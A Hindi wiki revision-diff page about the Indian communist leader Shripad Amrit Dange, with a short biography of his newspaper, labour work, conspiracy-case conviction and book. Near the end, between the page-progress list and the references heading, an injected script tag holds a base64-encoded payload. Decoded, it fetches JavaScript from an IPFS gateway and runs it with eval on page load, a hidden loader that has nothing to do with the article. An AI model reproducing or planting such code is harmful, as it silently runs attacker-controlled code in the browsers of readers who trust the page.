Difference between revisions of "श्रीपाद अमृत डांगे"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''श्रीपाद अमृत डांगे''' (जन्म [[10 अक्टूबर]] [[1899]]; मृत्यु [[22 मई]] [[1991]]) का [[भारत]] के प्रारम्भिक कम्युनिस्ट नेताओं में बहुत महत्त्वपूर्ण स्थान है।
'''श्रीपाद अमृत डांगे''' का (जन्म [[10 अक्टूबर]] [[1899]]; मृत्यु [[22 मई]] [[1991]]) में हुआ था। [[भारत]] के प्रारम्भिक कम्युनिस्ट नेताओं में श्रीपाद अमृत डांगे का बहुत महत्त्वपूर्ण स्थान है।  
 
 
*वे [[बम्बई]] के रहने वाले थे तथा उन्होंने भारत में समाजवादी विचारों के प्रसार करने के लिए 'द सोशलिस्ट' नामक समाचर-पत्र प्रकाशित करना प्रारम्भ किया।  
 
*वे [[बम्बई]] के रहने वाले थे तथा उन्होंने भारत में समाजवादी विचारों के प्रसार करने के लिए 'द सोशलिस्ट' नामक समाचर-पत्र प्रकाशित करना प्रारम्भ किया।  
 
*उन्होंने मजदूरों में चेतना जाग्रत की तथा उन्हें अपने हितों के लिए संघर्ष करते हुए प्रोत्साहित किया।  
 
*उन्होंने मजदूरों में चेतना जाग्रत की तथा उन्हें अपने हितों के लिए संघर्ष करते हुए प्रोत्साहित किया।  

Revision as of 10:12, 29 June 2012

shripad amrit daange (janm 10 aktoobar 1899; mrityu 22 mee 1991) ka bharat ke prarambhik kamyunist netaoan mean bahut mahattvapoorn sthan hai.

  • ve bambee ke rahane vale the tatha unhoanne bharat mean samajavadi vicharoan ke prasar karane ke lie 'd soshalist' namak samachar-patr prakashit karana prarambh kiya.
  • unhoanne majadooroan mean chetana jagrat ki tatha unhean apane hitoan ke lie sangharsh karate hue protsahit kiya.
  • shripad amrit daange dvitiy aur chauthi lokasabha ke sadasy chune gaye.
  • kanapur shadayantr kes ke tahat jin 4 samajavadi netaoan par mukadama chalaya gaya tha, unamean daange bhi sammilit the. isake aantargat unhean 4 varsh ki saza di gee.
  • unhoanne 'gaandhi v lenin' namak pustak bhi likhi, jisamean in donoan netaoan tatha unake vicharoan ka tulanatmak vishleshan kiya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh